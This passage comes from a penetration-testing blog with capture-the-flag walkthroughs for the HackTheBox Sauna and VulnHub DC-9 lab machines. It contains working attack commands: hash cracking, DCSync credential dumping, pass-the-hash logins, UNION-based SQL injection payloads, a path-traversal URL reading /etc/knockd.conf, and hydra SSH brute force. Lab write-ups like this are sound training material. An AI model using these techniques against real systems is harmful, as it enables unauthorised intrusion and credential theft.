<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt --force</span><br><span class="line"></span><br><span class="line">[email protected]:6917e50f638536dc4a8acec7903dc045$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:Thestrokes23</span><br></pre></td></tr></table></figure>
<h3 id="Evil-winrm"><a href="#Evil-winrm" class="headerlink" title="Evil-winrm"></a>Evil-winrm</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23</span><br></pre></td></tr></table></figure>
<p>user.txt is in <code>C:\Users\FSmith\desktop</code>.</p>
<img src="/undefined/55527558/user.png" alt="user.txt on FSmith's desktop">
<h2 id="Priv-fsmith-–-gt-svc-loanmgr"><a href="#Priv-fsmith-–-gt-svc-loanmgr" class="headerlink" title="Priv: fsmith –> svc_loanmgr"></a>Priv: fsmith –> svc_loanmgr</h2><p>Use <code>smbserver.py</code> to transfer enumeration tools such as <code>winpeas.exe</code> to the target and gather information.</p>
<p>On the attack host:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-smbserver share . -smb2support</span><br></pre></td></tr></table></figure>
<p>On the victim host:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy \\\\10.10.16.2\\share\winpeas.exe</span><br></pre></td></tr></table></figure>
<p>Then we get information like this:</p>
<img src="/undefined/55527558/svc_loadnmanager.png" alt="winPEAS output with svc_loanmgr information">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\> net user</span><br><span class="line"></span><br><span class="line">User accounts for \\ </span><br><span class="line"></span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">Administrator FSmith Guest</span><br><span class="line">HSmith krbtgt svc_loanmgr</span><br><span class="line">The command completed with one or more errors.</span><br></pre></td></tr></table></figure>
<p>Use evil-winrm to log in as svc_loanmgr with the credentials recovered above:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'</span><br></pre></td></tr></table></figure>
<h2 id="Priv-svc-loanmgr-–-gt-root"><a href="#Priv-svc-loanmgr-–-gt-root" class="headerlink" title="Priv: svc_loanmgr –> root"></a>Priv: svc_loanmgr –> root</h2><h3 id="Bloodhound"><a href="#Bloodhound" class="headerlink" title="Bloodhound"></a>Bloodhound</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bloodhound.py -c all -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL --zip</span><br></pre></td></tr></table></figure>
<p>Then import the zip file into BloodHound.</p>
<h3 id="Analyze-result"><a href="#Analyze-result" class="headerlink" title="Analyze result"></a>Analyze result</h3><img src="/undefined/55527558/image-20230507220204297.png" alt="BloodHound analysis result">
<img src="/undefined/55527558/image-20230507220209450.png" alt="BloodHound analysis result (continued)">
<p>Through BloodHound, we find that svc_loanmgr has DCSync privileges over the domain (directory replication rights, which let the account pull any user's password hash from the DC), so we can simply use <code>secretsdump.py</code>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">impacket-secretdump 'svc_loanmgr:[email protected]'</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::</span><br><span class="line">EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::</span><br><span class="line">EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::</span><br><span class="line">EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::</span><br><span class="line">SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:49f07e880c2babbb9f51fd264c51f979:::</span><br><span class="line"><SNIP></span><br></pre></td></tr></table></figure>
<h3 id="PTH"><a href="#PTH" class="headerlink" title="PTH"></a>PTH</h3><p>Pass the hash with evil-winrm:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 10.10.10.175 -u Administator -H 823452073d75b9d1cf70ebdf86c7f98e</span><br></pre></td></tr></table></figure>
<p>Or with wmiexec:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-wmiexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 [email protected]</span><br></pre></td></tr></table></figure>
<p>Or use other methods.</p>
<p>Finally, read root.txt:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\users\administrator\desktop>type root.txt</span><br></pre></td></tr></table></figure>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/50abf7e1.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/50abf7e1.html" class="post-title-link" itemprop="url">Road-to-OSCP-5-DC09</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2023-04-13 11:51:30" itemprop="dateCreated datePublished" datetime="2023-04-13T11:51:30+08:00">2023-04-13</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2024-09-28 20:29:16" itemprop="dateModified" datetime="2024-09-28T20:29:16+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<h1 id="VULHUB-DC09-Walkthrough"><a href="#VULHUB-DC09-Walkthrough" class="headerlink" title="VULHUB-DC09-Walkthrough"></a>VULHUB-DC09-Walkthrough</h1><h2 id="Information"><a href="#Information" class="headerlink" title="Information"></a>Information</h2><p>DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.</p>
<p>The ultimate goal of this challenge is to get root and to read the one and only flag.</p>
<p>Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.</p>
<h2 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h2><h3 id="IP"><a href="#IP" class="headerlink" title="IP"></a>IP</h3><p>First, we need to know the target’s IP, so we use nmap to discover it.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$nmap -sn 192.168.137.0/24 </span><br><span class="line">Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 21:17 CST</span><br><span class="line">Nmap scan report for 192.168.137.2</span><br><span class="line">Host is up (0.00048s latency).</span><br><span class="line">Nmap scan report for 192.168.137.3</span><br><span class="line">Host is up (0.00043s latency).</span><br><span class="line">Nmap scan report for 192.168.137.4</span><br><span class="line">Host is up (0.00039s latency).</span><br><span class="line">Nmap done: 256 IP addresses (3 hosts up) scanned in 4.14 seconds</span><br></pre></td></tr></table></figure>
<p>Now we know it is 192.168.137.4.</p>
<h3 id="Port-x2F-Service"><a href="#Port-x2F-Service" class="headerlink" title="Port/Service"></a>Port/Service</h3><p>Time to run a TCP SYN scan for open TCP ports on the target:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap --min-rate 10000 -p- 192.168.137.4 -oN dc9-tcp-nmap-1</span><br></pre></td></tr></table></figure>
<p>And we get such a result:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> </span><br><span class="line">Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 21:34 CST</span><br><span class="line">Nmap scan report for 192.168.137.4</span><br><span class="line">Host is up (0.000071s latency).</span><br><span class="line">Not shown: 65533 closed tcp ports (reset)</span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">22/tcp filtered ssh</span><br><span class="line">80/tcp open http</span><br><span class="line">MAC Address: 00:0C:29:10:DF:0B (VMware)</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>Then try to get more details on these two ports. Port 22 is filtered, which suggests a <strong>port knock</strong> may be required (to tell the truth, I only learned that after searching the Internet). Port 80 is open, so we can move on to web testing later.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -sC -p22,80 192.168.137.4 -oN dc9-tcp-nmap-2</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">22/tcp filtered ssh</span><br><span class="line">80/tcp open http Apache httpd 2.4.38 ((Debian))</span><br><span class="line">|_http-title: Example.com - Staff Details - Welcome</span><br><span class="line">|_http-server-header: Apache/2.4.38 (Debian)</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">namp -sV --script=vuln -p22,80 192.168.137.4</span><br><span class="line">Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 21:41 CST</span><br><span class="line">Nmap scan report for 192.168.137.4</span><br><span class="line">Host is up (0.00036s latency).</span><br><span class="line"></span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">22/tcp filtered ssh</span><br><span class="line">80/tcp open http</span><br><span class="line">|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.</span><br><span class="line">|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)</span><br><span class="line">| http-enum: </span><br><span class="line">| /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'</span><br><span class="line">|_ /includes/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'</span><br><span class="line">| http-csrf: </span><br><span class="line">| Spidering limited to: maxdepth=3; 
maxpagecount=20; withinhost=192.168.137.4</span><br><span class="line">| Found the following possible CSRF vulnerabilities: </span><br><span class="line">| </span><br><span class="line">| Path: http://192.168.137.4:80/search.php</span><br><span class="line">| Form id: </span><br><span class="line">| Form action: results.php</span><br><span class="line">| </span><br><span class="line">| Path: http://192.168.137.4:80/manage.php</span><br><span class="line">| Form id: </span><br><span class="line">|_ Form action: manage.php</span><br><span class="line">|_http-dombased-xss: Couldn't find any DOM based XSS.</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 31.20 seconds</span><br></pre></td></tr></table></figure>
<p>Now we have some information about the target, such as <code>results.php</code>, <code>manage.php</code>, etc.</p>
<h2 id="Web-pentest"><a href="#Web-pentest" class="headerlink" title="Web pentest"></a>Web pentest</h2><p>Run a web content scan:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -u 192.168.137.4 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt </span><br><span class="line">===============================================================</span><br><span class="line">Gobuster v3.3</span><br><span class="line">by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)</span><br><span class="line">===============================================================</span><br><span class="line">[+] Url: http://192.168.137.4</span><br><span class="line">[+] 
Method: GET</span><br><span class="line">[+] Threads: 10</span><br><span class="line">[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt</span><br><span class="line">[+] Negative Status codes: 404</span><br><span class="line">[+] User Agent: gobuster/3.3</span><br><span class="line">[+] Timeout: 10s</span><br><span class="line">===============================================================</span><br><span class="line">2023/04/12 21:44:17 Starting gobuster in directory enumeration mode</span><br><span class="line">===============================================================</span><br><span class="line">/index.php (Status: 200) [Size: 917]</span><br><span class="line">/search.php (Status: 200) [Size: 1091]</span><br><span class="line">/config.php (Status: 200) [Size: 0]</span><br><span class="line">/.htaccess (Status: 403) [Size: 278]</span><br><span class="line">/logout.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/. (Status: 200) [Size: 917]</span><br><span class="line">/.html (Status: 403) [Size: 278]</span><br><span class="line">/results.php (Status: 200) [Size: 1056]</span><br><span class="line">/.php (Status: 403) [Size: 278]</span><br><span class="line">/manage.php (Status: 200) [Size: 1210]</span><br><span class="line">/display.php (Status: 200) [Size: 2961]</span><br><span class="line">/welcome.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/.htpasswd (Status: 403) [Size: 278]</span><br><span class="line">/.htm (Status: 403) [Size: 278]</span><br><span class="line">/session.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/.htpasswds (Status: 403) [Size: 278]</span><br><span class="line">/.htgroup (Status: 403) [Size: 278]</span><br><span class="line">/wp-forum.phps (Status: 403) [Size: 278]</span><br><span class="line">/.htaccess.bak (Status: 403) [Size: 278]</span><br><span class="line">/.htuser (Status: 403) [Size: 278]</span><br><span 
class="line">/.ht (Status: 403) [Size: 278]</span><br><span class="line">/.htc (Status: 403) [Size: 278]</span><br><span class="line">/.htaccess.old (Status: 403) [Size: 278]</span><br><span class="line">/.htacess (Status: 403) [Size: 278]</span><br><span class="line">Progress: 20866 / 37051 (56.32%)[ERROR] 2023/04/12 21:44:19 [!] parse "http://192.168.137.4/directory\t\te.g.": net/url: invalid control character in URL</span><br><span class="line">Progress: 35281 / 37051 (95.22%)===============================================================</span><br><span class="line">2023/04/12 21:44:20 Finished</span><br><span class="line">============================================================</span><br></pre></td></tr></table></figure>
<p>Some interesting files were found.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">/index.php (Status: 200) [Size: 917]</span><br><span class="line">/session.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/search.php (Status: 200) [Size: 1091]</span><br><span class="line">/config.php (Status: 200) [Size: 0]</span><br><span class="line">/logout.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/. (Status: 200) [Size: 917]</span><br><span class="line">/results.php (Status: 200) [Size: 1056]</span><br><span class="line">/manage.php (Status: 200) [Size: 1210]</span><br><span class="line">/display.php (Status: 200) [Size: 2961]</span><br><span class="line">/welcome.php (Status: 302) [Size: 0] [--> manage.php]</span><br></pre></td></tr></table></figure>
<p>So, let’s try them.</p>
<p>When requesting session.php, we found a Set-Cookie header in the response.</p>
<img src="/undefined/50abf7e1/image-20230412215235471.png" alt="Response from session.php containing a Set-Cookie header">
<p>So I added that cookie to the request for manage.php to log in, and it worked: the application issues a valid session without any authentication.</p>
<img src="/undefined/50abf7e1/image-20230412215351703.png" alt="manage.php accessed with the session cookie">
<p>Then we notice the text <em>File does not exist</em> on this page, which suggests a local file inclusion (LFI) — and indeed there is one.</p>
<img src="/undefined/50abf7e1/image-20230412215538449.png" alt="Local file inclusion confirmed on manage.php">
<p>Save the usernames to a local file:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">marym</span><br><span class="line">julied</span><br><span class="line">fredf</span><br><span class="line">barneyr</span><br><span class="line">tomc</span><br><span class="line">jerrym</span><br><span class="line">wilmaf</span><br><span class="line">bettyr</span><br><span class="line">chandlerb</span><br><span class="line">joeyt</span><br><span class="line">rachelg</span><br><span class="line">rossg</span><br><span class="line">monicag</span><br><span class="line">phoebeb</span><br><span class="line">scoots</span><br><span class="line">janitor</span><br><span class="line">janitor2</span><br></pre></td></tr></table></figure>
<p>Then I found an attack surface in <strong>results.php</strong>: SQL injection.</p>
<p>First, I try a simple tautology payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' or 1=1;#</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412220042466.png" alt="results.php response to the tautology payload">
<p>So I continue with a <strong>UNION</strong>-based injection.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' union select 1,2,3,4,5,6;#</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412220335949.png" alt="results.php response to the UNION SELECT payload">
<p>After testing, I find that the page displays only one row of output, so we can use <em>group_concat()</em> to pack multiple rows into a single value.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' union select 1,2,3,4,5,group_concat(0x7e,schema_name,0x7e) from information_schema.schemata</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412221247878.png" alt="Schema names returned via group_concat">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' union select 1,2,3,4,5,(select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database());#</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412220902699.png" alt="Table names of the current database">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' union select 1,2,3,4,5,group_concat(0x7e,username,0x7e,password,0x7e) from users.UserDetails;#</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412221104078.png" alt="Usernames and passwords from users.UserDetails">
<p>Save the passwords to a local file:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">3kfs86sfd</span><br><span class="line">468sfdfsd2</span><br><span class="line">4sfd87sfd1</span><br><span class="line">RocksOff</span><br><span class="line">TC&TheBoyz</span><br><span class="line">B8m#48sd</span><br><span class="line">Pebbles</span><br><span class="line">BamBam01</span><br><span class="line">UrAG0D!</span><br><span class="line">Passw0rd</span><br><span class="line">yN72#dsd</span><br><span class="line">ILoveRachel</span><br><span class="line">3248dsds7s</span><br><span class="line">smellycats</span><br><span class="line">YR3BVxxxw87</span><br><span class="line">Ilovepeepee</span><br></pre></td></tr></table></figure>
<h2 id="Port-Knocking"><a href="#Port-Knocking" class="headerlink" title="Port Knocking"></a>Port Knocking</h2><p>Remember the filtered SSH port, which suggested that port knocking might be in use? Now that we can read files on the target through the LFI, we can try to locate the <em>knockd.conf</em> configuration file, which by default lives in the <em>/etc/</em> folder. This means our URL should be:<br> <code>http://192.168.137.4/manage.php?file=../../../../../../../../etc/knockd.conf</code></p>
<img src="/undefined/50abf7e1/image-20230412221532885.png" alt="Contents of /etc/knockd.conf read through the LFI">
<p>Now we know the sequence of ports we need to hit with SYN packets to open the SSH port: 7469, 8475 and finally 9842. Keep in mind that the order matters!</p>
<p>We can use one of the following methods:</p>
<ol>
<li><p><a target="_blank" rel="noopener" href="https://linux.die.net/man/1/knockd">knockd</a> - needs to be installed.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">knock 192.168.137.4 7469 8475 9842</span><br></pre></td></tr></table></figure>
</li>
<li><p><a target="_blank" rel="noopener" href="https://tools.kali.org/information-gathering/hping3">hping3</a> - pre-installed on Kali. Use the following command to send one SYN packet to each port (the example below uses 10.0.0.235; substitute the actual target, 192.168.137.4):</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hping3 -S 10.0.0.235 -p 7469 -c 1; hping3 -S 10.0.0.235 -p 8475 -c 1; hping3 -S 10.0.0.235 -p 9842 -c 1</span><br></pre></td></tr></table></figure>
</li>
<li><p><a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Netcat">netcat</a> - I’ll use this method as it is (manual but) easy.<br>We need to connect to each port and press CTRL+C to end the connection before moving on to the next port.</p>
</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.137.4 7469</span><br><span class="line">nc 192.168.137.4 8475 </span><br><span class="line">nc 192.168.137.4 9842 </span><br></pre></td></tr></table></figure>
<p>Then port 22 is open.</p>
<h2 id="SSH-brute"><a href="#SSH-brute" class="headerlink" title="SSH brute"></a>SSH brute</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hydra -L username -P password ssh://192.168.137.4</span><br><span class="line"></span><br><span class="line">[22][ssh] host: 192.168.137.4 login: chandlerb password: UrAG0D! </span><br><span class="line">[22][ssh] host: 192.168.137.4 login: joeyt password: Passw0rd [22][ssh] host: 192.168.137.4 login: janitor password: Ilovepeepee</span><br></pre></td></tr></table></figure>
<p>We got three valid username:password pairs.</p>
<p>Log in via SSH. When logged in as janitor, we find additional passwords in <code>/home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt</code>; add them to the password file.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">3kfs86sfd</span><br><span class="line">468sfdfsd2</span><br><span class="line">4sfd87sfd1</span><br><span class="line">RocksOff</span><br><span class="line">TC&TheBoyz</span><br><span class="line">B8m#48sd</span><br><span class="line">Pebbles</span><br><span class="line">BamBam01</span><br><span class="line">UrAG0D!</span><br><span class="line">Passw0rd</span><br><span class="line">yN72#dsd</span><br><span class="line">ILoveRachel</span><br><span class="line">3248dsds7s</span><br><span class="line">smellycats</span><br><span class="line">YR3BVxxxw87</span><br><span class="line">Ilovepeepee</span><br><span class="line">Hawaii-Five-0</span><br><span class="line">BamBam01</span><br><span class="line">Passw0rd</span><br><span class="line">smellycats</span><br><span class="line">P0Lic#10-4</span><br><span class="line">B4-Tru3-001</span><br><span class="line">4uGU5T-NiGHts</span><br></pre></td></tr></table></figure>
<p>Back to brute-forcing with the extended password list.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">hydra -L username -P password ssh://192.168.137.4</span><br><span class="line"></span><br><span class="line">[22][ssh] host: 192.168.137.4 login: chandlerb password: UrAG0D! </span><br><span class="line">[22][ssh] host: 192.168.137.4 login: joeyt password: Passw0rd [22][ssh] host: 192.168.137.4 login: janitor password: Ilovepeepee</span><br><span class="line">[22][ssh] host: 192.168.137.4 login: fredf password: B4-Tru3-001</span><br></pre></td></tr></table></figure>
<h2 id="Privilege-up"><a href="#Privilege-up" class="headerlink" title="Privilege up"></a>Privilege up</h2><p>A new account, <code>fredf</code>. Log in as fredf and check what it is allowed to run through sudo with <code>sudo -l</code>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:/opt/devstuff$ sudo -l</span><br><span class="line">Matching Defaults entries for fredf on dc-9:</span><br><span class="line"> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</span><br><span class="line"></span><br><span class="line">User fredf may run the following commands on dc-9:</span><br><span class="line"> (root) NOPASSWD: /opt/devstuff/dist/test/test</span><br></pre></td></tr></table></figure>
<p>Running the binary with no arguments prints a usage hint. It is a compiled Python program, so look for the script it was built from:</p>
<img src="/undefined/50abf7e1/image-20230412222508505.png" class="" alt="Usage hint printed by /opt/devstuff/dist/test/test when run without arguments">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">find / -type f -name "test.py" 2>/dev/null</span><br><span class="line"></span><br><span class="line">/opt/devstuff/test.py</span><br><span class="line">/usr/lib/python3/dist-packages/setuptools/command/test.py</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /opt/devstuff/test.py</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412222646923.png" class="" alt="Contents of /opt/devstuff/test.py">
